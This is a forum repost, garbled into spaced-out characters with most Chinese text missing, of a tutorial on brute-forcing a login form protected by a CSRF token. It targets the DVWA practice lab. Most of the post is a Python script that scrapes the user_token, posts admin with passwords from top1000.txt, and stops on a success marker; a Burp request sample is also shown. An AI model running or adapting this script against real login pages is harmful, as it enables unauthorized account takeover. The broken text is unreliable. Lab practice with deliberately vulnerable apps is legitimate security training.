搜索

[26709] 2021-04-04_编写有CSRF后台验证的登录框密码穷举脚本

文档创建者:s7ckTeam
浏览次数:45
最后更新:2025-01-19
2021-04-04_编写有CSRF后台验证的登录框密码穷举脚本 1 2 C S R F m o o n s e c   m o o n s e c   2 0 2 1 - 0 4 - 0 4 p y t h o n 3 E X P C S R F D V W A D V W A     E X P E X P p y t h o n 3 e x p h t t p s : / / g i t h u b . c o m / d i g i n i n j a / D V W A E X P d v a w 使 b u r p s u i t e 3 0 2 u s e r n a m e = a d m i n & p a s s w o r d = p a s s w o r d & L o g i n = L o g i n & u s e r _ t o k e n = 1 4 b 5 2 d 3 d f b 9 a 5 2 5 4 8 8 3 8 5 f 9 5 3 0 3 9 5 d d f c s r f
3 c s r f c s r f 访 u s e r _ t o k e n u s e r _ t o k e n s e e s i o n s e s s i o n   c s r f
4 i f ( c s r f = =   c s r f ) { I f p a s s w r o d = =   p a s s w o r d { } } e l s e { c s r f } b u r t e _ l o g i n # c o d i n g : u t f - 8 i m p o r t   r e q u e s t s i m p o r t   r e u r l   =   " h t t p : / / w w w . d v w a . c o m / l o g i n . p h p " d e f   l o g i n ( p a s s w o r d ) :         s e s s i o n   =   r e q u e s t s . s e s s i o n ( )         r e q = s e s s i o n . g e t ( u r l )         u s e r _ t o k e n = r e . s e a r c h ( " [ a - z 0 - 9 ] { 3 2 } " , r e q . t e x t ) . g r o u p ( 0 )   # 3 2 m d 5         d a t a = { " u s e r n a m e " : " a d m i n " , " p a s s w o r d " : p a s s w o r d , " L o g i n " : " L o g i n " , ' u s e r _ t o k e n ' : u s e r _ t o k e n }         r e q = s e s s i o n . p o s t ( u r l = u r l , d a t a = d a t a , a l l o w _ r e d i r e c t s = T r u e )         h t m l   =   r e q . t e x t         r e t u r n   h t m l w i t h   o p e n ( ' t o p 1 0 0 0 . t x t ' )   a s   p :         p a s s l i s t   = p . r e a d l i n e s ( )         p . c l o s e ( ) f o r   l i n e   i n   p a s s l i s t :         l i n e   =   l i n e . s t r i p ( " n " )         p r i n t ( l i n e )         i f   ' F i l e   U p l o a d '   i n   l o g i n ( l i n e ) :                 p r i n t (   " [ *     i s   % s   * ] "   %   l i n e   )                 b r e a k
5  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理